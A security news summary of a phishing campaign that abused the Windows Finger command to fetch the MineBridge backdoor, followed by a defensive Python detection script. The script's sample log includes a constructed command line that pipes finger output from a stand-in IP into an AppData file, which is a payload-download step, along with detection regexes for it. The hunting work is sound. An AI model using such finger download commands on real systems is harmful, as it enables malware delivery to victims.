Windows Finger command abused by phishing to download malware (Security News, January 2021)
Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
The deobfuscated command executed by the macro, shown below, uses the finger command to download a Base64-encoded "certificate" from a remote server and saves it as %AppData%\vUCooUr.
The certificate retrieved via the finger command is in fact a Base64-encoded executable: a downloader for the next stage of the infection.
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
As Finger is rarely used today, administrators are advised to block the Finger command on their network, whether through AppLocker or other methods.
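Where blocking finger.exe is not yet in place, the behaviour described above is also straightforward to hunt for in process-creation telemetry: finger.exe executing at all, finger being invoked from a command line whose output is redirected into a file, or either of these happening under an Office parent process. The script below is an added example written for this summary, not code from the article or from the researcher; it runs a small set of such checks over constructed Sysmon-style events (Event ID 1 process creation and Event ID 3 network connection, using the Sysmon field names Image, ParentImage, CommandLine, DestinationIp and DestinationPort). The JSON-lines layout, the sample command lines and the IP address are all made up for the example; the %AppData%\vUCooUr path is the one the summary names.

```python
from __future__ import annotations

import json
import ntpath
import re
from dataclasses import dataclass

# Constructed sample events (NOT real telemetry from the campaign), one JSON
# object per line, in the shape a Sysmon -> Winlogbeat style pipeline emits.
# 203.0.113.5 is a documentation-only address; the command lines are invented.
SAMPLE_LOG = r'''
{"EventID":1,"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"cmd.exe /c finger update@203.0.113.5 > %AppData%\\vUCooUr"}
{"EventID":1,"Image":"C:\\Windows\\System32\\finger.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"finger update@203.0.113.5"}
{"EventID":1,"Image":"C:\\Windows\\System32\\finger.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"finger admin@bsd-host.corp.example"}
{"EventID":1,"Image":"C:\\Program Files\\Git\\bin\\git.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"git fingerprint-tool"}
{"EventID":3,"Image":"C:\\Windows\\System32\\finger.exe","DestinationIp":"203.0.113.5","DestinationPort":79}
'''

# Office hosts whose child processes should not be running network tools.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# "finger" or "finger.exe" as a whole token; deliberately does not match "fingerprint".
FINGER_TOKEN = re.compile(r"\bfinger(?:\.exe)?\b", re.IGNORECASE)
# Shell output redirection into a file: the step that turns a finger query into a download.
REDIRECT_TO_FILE = re.compile(r">\s*\S+")


@dataclass
class Finding:
    line_no: int
    severity: str        # "low", "medium" or "high"
    reasons: list[str]


def _basename(path: str) -> str:
    # ntpath handles Windows separators regardless of the OS the analyst runs on.
    return ntpath.basename(path or "").lower()


def analyse_event(event: dict) -> list[str]:
    """Return the reasons a single event is suspicious (empty list if none)."""
    reasons: list[str] = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    if event.get("EventID") == 1:
        if image == "finger.exe":
            reasons.append("finger.exe process created")
        elif FINGER_TOKEN.search(cmdline):
            reasons.append("finger invoked from another process's command line")
        # The two context checks only matter once finger is actually involved.
        if reasons and REDIRECT_TO_FILE.search(cmdline):
            reasons.append("finger output redirected to a file (download behaviour)")
        if reasons and parent in OFFICE_APPS:
            reasons.append(f"spawned by Office application {parent}")
    elif event.get("EventID") == 3 and image == "finger.exe":
        reasons.append(
            f"finger.exe network connection to "
            f"{event.get('DestinationIp')}:{event.get('DestinationPort')}"
        )
    return reasons


def scan_log(text: str) -> list[Finding]:
    """Scan JSON-lines events and return one Finding per suspicious event."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.strip().splitlines(), start=1):
        raw = raw.strip()
        if not raw:
            continue
        reasons = analyse_event(json.loads(raw))
        if reasons:
            severity = "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"
            findings.append(Finding(line_no, severity, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity.upper()}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run against the sample, the first event (Word spawning cmd, finger output redirected into %AppData%) scores high, the bare finger.exe executions and the port 79 connection score low, and the git command line containing "fingerprint" is not flagged. Because finger is so rarely used legitimately, even the low-severity hits are worth reviewing; the redirection and Office-parent checks exist to rank them, not to suppress them.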